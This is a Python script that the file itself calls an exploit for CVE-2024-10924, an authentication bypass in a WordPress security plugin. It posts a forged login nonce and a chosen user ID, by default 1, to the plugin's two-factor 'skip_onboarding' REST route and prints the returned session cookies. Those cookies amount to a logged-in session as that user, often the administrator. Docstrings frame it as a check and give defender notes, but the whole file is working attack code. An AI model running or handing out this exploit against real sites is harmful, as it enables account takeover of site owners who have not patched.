import argparse
from validator_collection import checkers
import requests
import random
def main():
    """
    Parse the command line, normalise the target URL and print the check result.

    Takes a positional ``url`` and an optional ``-id`` (integer user ID).
    On success the value printed between the separator lines is the raw
    ``Set-Cookie`` header returned by ``send_request`` — session material
    that should be kept out of shared logs and terminals.
    """
    cli = argparse.ArgumentParser(description='Exploit for CVE-2024-10924')
    cli.add_argument('-id', type=int, help='User ID (optional)', default=None)
    cli.add_argument('url', type=str, help='URL of the target')
    parsed = cli.parse_args()

    # A missing (None) or zero -id falls back to user ID 1.
    user_id = parsed.id if parsed.id else 1
    target = parsed.url

    if not target:
        print('URL is required.')
        return

    # send_request() appends "?rest_route=..." directly, so the base URL
    # must end with a slash before it is validated and used.
    if not target.endswith("/"):
        target = f"{target}/"

    if not checkers.is_url(target):
        print(f'Invalid URL. {target}')
        return

    success, response = send_request(target, user_id)
    if not success:
        # On failure `response` is the explanatory message.
        print(response)
        return

    separator = '-' * 50
    print('Exploit successful.\n')
    print(separator)
    print(response)
    print(separator)
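def send_request(url: str, id: int) -> tuple:
    """
    Send the CVE-2024-10924 check request to a WordPress site and classify the reply.

    The request is a POST without any prior session to the REST route
    ``/reallysimplessl/v1/two_fa/skip_onboarding`` with a JSON body holding
    ``user_id``, ``login_nonce`` and ``redirect_to``. The site is reported as
    affected when it answers 200, echoes ``redirect_to`` in the body and sets
    cookies that are not being cleared (no ``=deleted;`` marker).

    Defender notes: the route string above is a practical access-log and WAF
    indicator for this request, and the remedy is a plugin release that fixes
    CVE-2024-10924.

    Args:
        url: Base URL of the site, expected to end with ``/``.
        id: WordPress user ID placed in the ``user_id`` field.

    Returns:
        ``(True, set_cookie_header)`` when the response matches the affected
        pattern, otherwise ``(False, message)``.
    """
    endpoint = f"{url}?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
    headers = {
        'Content-Type': 'application/json'
    }
    data = {
        'user_id': id,
        # A random 10-digit value stands in for the nonce; presumably a patched
        # site rejects it, which is what makes this a usable check — confirm.
        'login_nonce': str(random.randint(1000000000, 9999999999)),
        "redirect_to": "/wp-admin/"
    }

    try:
        # NOTE(review): verify=False disables TLS certificate validation, so the
        # reply is not authenticated and an on-path party could forge either
        # outcome. Kept as in the original so self-signed test sites still work.
        # The timeout stops the call from hanging forever on a silent host.
        response = requests.post(
            endpoint, headers=headers, json=data, verify=False, timeout=30
        )
    except requests.RequestException as exc:
        # Keep the (bool, message) contract instead of surfacing a traceback.
        return False, f"Request failed: {exc}"

    # .get() avoids the KeyError the original raised whenever the response
    # carried no Set-Cookie header (the normal case for an unaffected site).
    set_cookie = response.headers.get('Set-Cookie')
    if (
        response.status_code == 200
        and set_cookie is not None
        and "redirect_to" in response.text
        and "=deleted;" not in set_cookie
    ):
        return True, set_cookie
    return False, "Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect."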
# Run the command-line entry point only when the file is executed as a
# script, not when it is imported as a module.
if __name__ == "__main__":
    main()